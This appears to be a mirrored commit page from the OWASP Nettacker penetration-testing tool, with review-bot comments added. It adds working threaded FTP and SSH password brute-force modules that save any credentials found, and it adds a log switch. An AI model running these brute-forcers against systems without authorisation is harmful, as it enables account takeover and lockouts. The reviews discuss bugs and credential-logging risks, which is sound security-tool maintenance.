mirror of https://github.com/OWASP/Nettacker.git
add ftp,ssh bruteforcer + add log switch + fix some bugs
parent
a2f0d739cd
commit
1df375e7ce
|
|
@ -11,4 +11,5 @@ tmp/subs_temp
|
|||
tmp/tmp_targets
|
||||
results.txt
|
||||
user.txt
|
||||
pass.txt
|
||||
pass.txt
|
||||
logs.txt
|
||||
|
|
@ -5,6 +5,10 @@ from core import color
|
|||
|
||||
|
||||
def info(content):
|
||||
if '-L' in sys.argv or '--logs' in sys.argv:
|
||||
f=open('logs.txt','a')
|
||||
f.write('[+] ' + str(content) + '\n')
|
||||
f.close()
|
||||
if '\n' in content:
|
||||
num_newline = len(content) - len(content.rstrip("\n"))
|
||||
sys.stdout.write(color.color('yellow') + '[+] ' + color.color('green') +
|
||||
|
|
@ -16,11 +20,19 @@ def info(content):
|
|||
|
||||
|
||||
def write(content):
|
||||
if '-L' in sys.argv or '--logs' in sys.argv:
|
||||
f=open('logs.txt','a')
|
||||
f.write(str(content) + '\n')
|
||||
f.close()
|
||||
sys.stdout.write(content)
|
||||
return
|
||||
|
||||
|
||||
def warn(content):
|
||||
if '-L' in sys.argv or '--logs' in sys.argv:
|
||||
f=open('logs.txt','a')
|
||||
f.write('[!] ' + str(content) + '\n')
|
||||
f.close()
|
||||
if '\n' in content:
|
||||
num_newline = len(content) - len(content.rstrip("\n"))
|
||||
sys.stdout.write(color.color('blue') + '[!] ' + color.color('yellow') +
|
||||
|
|
@ -32,6 +44,10 @@ def warn(content):
|
|||
|
||||
|
||||
def error(content):
|
||||
if '-L' in sys.argv or '--logs' in sys.argv:
|
||||
f=open('logs.txt','a')
|
||||
f.write('[X] ' + str(content) + '\n')
|
||||
f.close()
|
||||
if '\n' in content:
|
||||
num_newline = len(content) - len(content.rstrip("\n"))
|
||||
sys.stdout.write(color.color('red') + '[X] ' + color.color('yellow') +
|
||||
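Review bot: The four added logging blocks in `info`, `write`, `warn` and `error` append to `logs.txt` with no synchronisation and no `with`, although the brute-force modules added in this commit call `info`/`warn` from worker threads, so records can interleave and a failed write leaves the handle open. The log receives everything passed to `info`, which in this commit includes discovered passwords, so the file should be created with owner-only permissions rather than the process default. A single helper, sketched below, would replace the four copies; it needs `threading` and `os` imported in this module, which the hunks do not show. The bodies of all four functions continue outside the hunks.

```python
_log_lock = threading.Lock()


def _log(prefix, content):
    # One place for the -L/--logs file write; the alert functions are called from worker threads.
    if '-L' not in sys.argv and '--logs' not in sys.argv:
        return
    with _log_lock:
        # 0o600: the log can contain credentials reported through info().
        fd = os.open('logs.txt', os.O_WRONLY | os.O_APPEND | os.O_CREAT, 0o600)
        with os.fdopen(fd, 'a') as f:
            f.write(prefix + str(content) + '\n')


def info(content):
    _log('[+] ', content)
    # … unchanged: console output …
```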
|
|
|
|||
|
|
@ -7,11 +7,11 @@ from core.attack import start_attack
|
|||
from core.alert import *
|
||||
|
||||
def load():
|
||||
|
||||
write('\n\n')
|
||||
info('Nettacker engine started ...')
|
||||
|
||||
# module_names = ['smtp_brute', 'ftp_brute', 'rdp_brute', 'ssh_brute', 'http_brute', 'mysql_brute', 'mssql_brute']
|
||||
module_names = ['smtp_brute','port_scan']
|
||||
module_names = ['smtp_brute','port_scan','ftp_brute','ssh_brute']
|
||||
|
||||
parser = OptionParser(usage='python nettacker.py [options]', description='Nettacker Help Menu',
|
||||
epilog='Please read license and agreements https://github.com/Nettacker/Nettacker')
|
||||
|
|
@ -22,6 +22,8 @@ def load():
|
|||
help='find and scan subdomains')
|
||||
parser.add_option('-t', '--threads', action='store', default=5, type='int', dest='thread_number',
|
||||
help='thread numbers')
|
||||
parser.add_option('-L', '--logs', action='store_true', default=False, dest='log_in_file',
|
||||
help='save all logs in file (logs.txt)')
|
||||
|
||||
# Target Options
|
||||
target = OptionGroup(parser, "Target", "Target input options")
|
||||
|
|
@ -136,4 +138,5 @@ def load():
|
|||
n+=1
|
||||
start_attack(target.rsplit()[0],n,total_targets,scan_method,users,passwds,timeout_sec,thread_number,ports)
|
||||
write('\n')
|
||||
info('done!')
|
||||
info('done!')
|
||||
write('\n\n')
|
||||
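Review bot: The new `-L`/`--logs` option stores its value in `log_in_file`, but the alert functions changed in this same commit decide whether to log by testing `'-L' in sys.argv or '--logs' in sys.argv`, so the parsed value appears unused and the two can disagree (optparse accepts bundled short flags and unambiguous long-option abbreviations that the literal test does not match). Consider setting a module-level flag in `core.alert` from the parsed `log_in_file` value and testing that instead. The help text should also say what ends up in the file, e.g. `help='save all logs in file (logs.txt); includes any credentials found'`. `load()` starts and ends outside these hunks.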
|
|
@ -0,0 +1,2 @@
|
|||
#!/usr/bin/env python
|
||||
pass
|
||||
|
|
@ -0,0 +1,91 @@
|
|||
#!/usr/bin/env python
|
||||
import threading
|
||||
import time
|
||||
import ftplib
|
||||
from core.alert import *
|
||||
from ftplib import FTP
|
||||
|
||||
def login(user, passwd,target,port,timeout_sec):
|
||||
exit = 0
|
||||
while 1:
|
||||
try:
|
||||
my_ftp = FTP(timeout=timeout_sec)
|
||||
my_ftp.connect(target, port)
|
||||
exit = 0
|
||||
break
|
||||
except:
|
||||
exit += 1
|
||||
if exit is 10:
|
||||
warn('ftp connection to %s:%s timeout, skipping %s:%s'%(target,port,user,passwd))
|
||||
return 1
|
||||
time.sleep(0.1)
|
||||
flag = 1
|
||||
try:
|
||||
my_ftp.login(user, passwd)
|
||||
flag = 0
|
||||
except:
|
||||
pass
|
||||
if flag is 0:
|
||||
info('user:' + user + ' pass:' + passwd + ' server:' + target + ' port:' + str(port) + ' found!')
|
||||
save = open('results.txt', 'a')
|
||||
save.write('ftp ---> ' + user + ':' + passwd + ' ---> ' + target + ':' + str(port) + '\n')
|
||||
save.close()
|
||||
else:
|
||||
pass
|
||||
return flag
|
||||
|
||||
def start(target,users,passwds,ports,timeout_sec,thread_number,num,total): # Main function
|
||||
threads = []
|
||||
max = thread_number
|
||||
total_req = len(users) * len(passwds)
|
||||
for port in ports:
|
||||
# test ftp
|
||||
trying = 0
|
||||
portflag = True
|
||||
exit = 0
|
||||
while 1:
|
||||
try:
|
||||
my_ftp = FTP(timeout=timeout_sec)
|
||||
my_ftp.connect(target, port)
|
||||
exit = 0
|
||||
break
|
||||
except:
|
||||
exit += 1
|
||||
if exit is 3:
|
||||
error(
|
||||
'ftp connection to %s:%s failed, skipping whole step [process %s of %s]! going to next step' % (
|
||||
target, port, str(num), str(total)))
|
||||
portflag = False
|
||||
break
|
||||
time.sleep(0.1)
|
||||
|
||||
if portflag is True:
|
||||
for user in users:
|
||||
for passwd in passwds:
|
||||
t = threading.Thread(target=login, args=(user, passwd,target,port,timeout_sec))
|
||||
threads.append(t)
|
||||
t.start()
|
||||
trying += 1
|
||||
info('trying ' + str(trying) + ' of ' + str(total_req) + ' in process ' + str(num) + ' of ' + str(
|
||||
total) + ' ' + target + ':' + str(port))
|
||||
while 1:
|
||||
n = 0
|
||||
for thread in threads:
|
||||
if thread.isAlive() is True:
|
||||
n += 1
|
||||
else:
|
||||
threads.remove(thread)
|
||||
if n >= max:
|
||||
time.sleep(0.1)
|
||||
else:
|
||||
break
|
||||
|
||||
# wait for threads
|
||||
while 1:
|
||||
n = True
|
||||
for thread in threads:
|
||||
if thread.isAlive() is True:
|
||||
n = False
|
||||
time.sleep(0.1)
|
||||
if n is True:
|
||||
break
|
||||
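Review bot: `login()` and the probe at the top of `start()` never call `quit()` or `close()` on the `FTP` object, so every attempt leaves a control connection open until the server times it out; close it in a `finally` once the login result is known. Both retry loops use a bare `except:`, which in this Python 2 code also catches `KeyboardInterrupt` and `SystemExit`, and they compare counters with `is` (`exit is 10`, `flag is 0`), which only works through CPython's small-integer caching; `except ftplib.all_errors:` and `==` state the intent. In the throttle loop, `threads.remove(thread)` mutates the list being iterated and skips the following element, so iterate over `threads[:]`. Found credentials are appended to `results.txt` in clear text with default file permissions, and the smtp and ssh hunks in this commit do the same.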
|
|
@ -25,9 +25,9 @@ def login(user, passwd,target,port,timeout_sec):
|
|||
except smtplib.SMTPException, err:
|
||||
pass
|
||||
if flag is 0:
|
||||
info('user:' + user + ' pass:' + passwd + ' server:' + target + 'port:' + str(port) + ' found!')
|
||||
info('user:' + user + ' pass:' + passwd + ' server:' + target + ' port:' + str(port) + ' found!')
|
||||
save = open('results.txt', 'a')
|
||||
save.write(user + ':' + passwd + '\n')
|
||||
save.write('smtp ---> ' + user + ':' + passwd + ' ---> ' + target + ':' + str(port) + '\n')
|
||||
save.close()
|
||||
else:
|
||||
pass
|
||||
|
|
|
|||
|
|
@ -0,0 +1,2 @@
|
|||
#!/usr/bin/env python
|
||||
pass
|
||||
|
|
@ -0,0 +1,102 @@
|
|||
#!/usr/bin/env python
|
||||
import threading
|
||||
import time
|
||||
import paramiko
|
||||
from core.alert import *
|
||||
|
||||
|
||||
def login(user, passwd,target,port,timeout_sec):
|
||||
exit = 0
|
||||
flag = 1
|
||||
while 1:
|
||||
try:
|
||||
ssh = paramiko.SSHClient()
|
||||
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
|
||||
ssh.connect(target, username=user, password=passwd, timeout=timeout_sec)
|
||||
flag = 0
|
||||
exit = 0
|
||||
break
|
||||
except:
|
||||
exit += 1
|
||||
if exit is 10:
|
||||
warn('ssh connection to %s:%s timeout, skipping %s:%s'%(target,port,user,passwd))
|
||||
return 1
|
||||
time.sleep(0.1)
|
||||
|
||||
if flag is 0:
|
||||
info('user:' + user + ' pass:' + passwd + ' server:' + target + ' port:' + str(port) + ' found!')
|
||||
save = open('results.txt', 'a')
|
||||
save.write('ssh ---> ' + user + ':' + passwd + ' ---> ' + target + ':' + str(port) + '\n')
|
||||
save.close()
|
||||
else:
|
||||
pass
|
||||
return flag
|
||||
|
||||
def start(target,users,passwds,ports,timeout_sec,thread_number,num,total): # Main function
|
||||
threads = []
|
||||
max = thread_number
|
||||
total_req = len(users) * len(passwds)
|
||||
for port in ports:
|
||||
# test ssh
|
||||
trying = 0
|
||||
portflag = True
|
||||
exit = 0
|
||||
while 1:
|
||||
try:
|
||||
ssh = paramiko.SSHClient()
|
||||
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
|
||||
ssh.connect(target, username='',password='',timeout=timeout_sec)
|
||||
exit = 0
|
||||
break
|
||||
except paramiko.ssh_exception.AuthenticationException, ssherr:
|
||||
if 'Authentication failed.' in ssherr:
|
||||
break
|
||||
else:
|
||||
exit += 1
|
||||
if exit is 3:
|
||||
error(
|
||||
'ssh connection to %s:%s failed, skipping whole step [process %s of %s]! going to next step' % (
|
||||
target, port, str(num), str(total)))
|
||||
portflag = False
|
||||
break
|
||||
time.sleep(0.1)
|
||||
except:
|
||||
exit += 1
|
||||
if exit is 3:
|
||||
error(
|
||||
'ssh connection to %s:%s failed, skipping whole step [process %s of %s]! going to next step' % (
|
||||
target, port, str(num), str(total)))
|
||||
portflag = False
|
||||
break
|
||||
time.sleep(0.1)
|
||||
|
||||
if portflag is True:
|
||||
for user in users:
|
||||
for passwd in passwds:
|
||||
t = threading.Thread(target=login, args=(user, passwd,target,port,timeout_sec))
|
||||
threads.append(t)
|
||||
t.start()
|
||||
trying += 1
|
||||
info('trying ' + str(trying) + ' of ' + str(total_req) + ' in process ' + str(num) + ' of ' + str(
|
||||
total) + ' ' + target + ':' + str(port))
|
||||
while 1:
|
||||
n = 0
|
||||
for thread in threads:
|
||||
if thread.isAlive() is True:
|
||||
n += 1
|
||||
else:
|
||||
threads.remove(thread)
|
||||
if n >= max:
|
||||
time.sleep(0.1)
|
||||
else:
|
||||
break
|
||||
|
||||
# wait for threads
|
||||
while 1:
|
||||
n = True
|
||||
for thread in threads:
|
||||
if thread.isAlive() is True:
|
||||
n = False
|
||||
time.sleep(0.1)
|
||||
if n is True:
|
||||
break
|
||||
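Review bot: Neither `ssh.connect(...)` call passes the port, so every connection goes to paramiko's default port while the loop, the console messages and `results.txt` report `target:port`; pass it through, `ssh.connect(target, port=port, username=user, password=passwd, timeout=timeout_sec)`, and do the same in the probe in `start()`. In `login()` the bare `except:` treats a rejected password like a network failure, so each wrong pair is retried ten times and then reported as a timeout, which multiplies failed-login events and lockout risk on the system under test; handle `paramiko.ssh_exception.AuthenticationException` first and `return 1`. `'Authentication failed.' in ssherr` tests the exception object rather than its text, so use `str(ssherr)`. The `SSHClient` objects are never closed, and `threads.remove(thread)` inside `for thread in threads` skips elements; iterate over `threads[:]`.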
|
|
@ -10,9 +10,10 @@ def connect(host, port,timeout_sec):
|
|||
s.settimeout(timeout_sec)
|
||||
s.connect((host, port))
|
||||
s.close()
|
||||
info('server:' + host + 'port:' + str(port) + ' found!')
|
||||
info('server:' + host + ' port:' + str(port) + ' found!')
|
||||
f = open('results.txt','a')
|
||||
f.write(host + ':' + str(port) + '\n')
|
||||
f.write('open port ---> ' + host + ':' + str(port) + '\n')
|
||||
f.close()
|
||||
return True
|
||||
except socket.error:
|
||||
return False
|
||||
|
|
|
|||
|
|
@ -1,3 +1,5 @@
|
|||
netaddr
|
||||
dnspython
|
||||
requests
|
||||
requests
|
||||
ftplib
|
||||
paramiko
|
||||
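Review bot: `ftplib` is part of the Python standard library, so listing it here makes the installer fetch whatever third-party distribution is published under that name on the package index, which is an avoidable supply-chain exposure; drop the line. `paramiko`, like the existing entries, is unpinned, so installs are not reproducible; consider a version bound. The file name is not shown on this page, so this assumes the section is the pip requirements list.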